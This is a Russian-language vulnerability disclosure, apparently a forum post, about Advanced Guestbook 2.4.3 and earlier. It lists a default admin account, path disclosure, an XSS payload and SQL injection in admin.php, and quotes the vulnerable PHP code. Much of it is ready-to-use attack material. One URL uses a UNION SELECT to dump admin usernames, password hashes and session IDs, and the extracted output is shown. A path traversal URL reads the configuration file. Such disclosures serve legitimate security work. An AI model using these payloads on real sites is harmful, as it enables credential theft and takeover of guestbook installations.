Advanced Guestbook <=2.4.3 уязвимости (малозначимые) 1) Дефолтный аккаунт администратора: 2) Раскрытие пути в install.php (при нажатии на кнопку) (error_reporting=On) Warning: mysql_connect(): Access denied for user 'ODBC'@'localhost' (using password: NO) in Q:\home\localhost\www\agb\install.php on line 258 Cannot connect to database Также в скрипте misc/forget_pass.php. 3) XSS в скрипте install.php: POST: ...&host=localhost"><h1>Here_I_am.... 4) SQL инъекция в скрипте admin.php (magic_quotes=Off): admin.php?action=smilies&session=ef7658b27e55dc2264d2ee175a546f5c&uid=1&del_smilie=1' Уязвимый код: PHP: if (isset($del_smilie)) { $gb_auth->query("DELETE FROM ".$GB_TBL['smile']." WHERE id='$del_smilie'"); admin.php?action=smilies&session=ef7658b27e55dc2264d2ee175a546f5c&uid=1&edit_smilie=1' Уязвимый код: PHP: if (isset($edit_smilie)) { if (isset($s_code) && isset($s_emotion)) { if (!get_magic_quotes_gpc()) { $s_code = addslashes($s_code); $s_emotion = addslashes($s_emotion); } $gb_auth->query("UPDATE ".$GB_TBL['smile']." SET s_code='$s_code', s_emotion='$s_emotion' WHERE id='$edit_smilie'"); Пример использования: admin.php?action=smilies&session=ef7658b27e55dc2264d2ee175a546f5c&uid=1&edit_smilie=1'+and+(1=0) +union+select+1,2,concat(username,':',password,':',session),4,5,6+from+book_auth/* admin:29bad1457ee5e49e:ea3d671d4778a037b0fb42ef738fc521 Уязвимый код: PHP: $gb_auth->query("SELECT * FROM ".$GB_TBL['smile']." WHERE id='$edit_smilie'"); 5) Чтение произвольных (практически ;-)) файлов (бага старая, перекочевала из предыдущих версий): Пример использования: admin.php?action=template&tpl_name=../admin/config.inc.php&session=e17acac372b1cd1c197b838f2346d6c0&uid=1 P. S. сессии администратора существуют в течение получаса.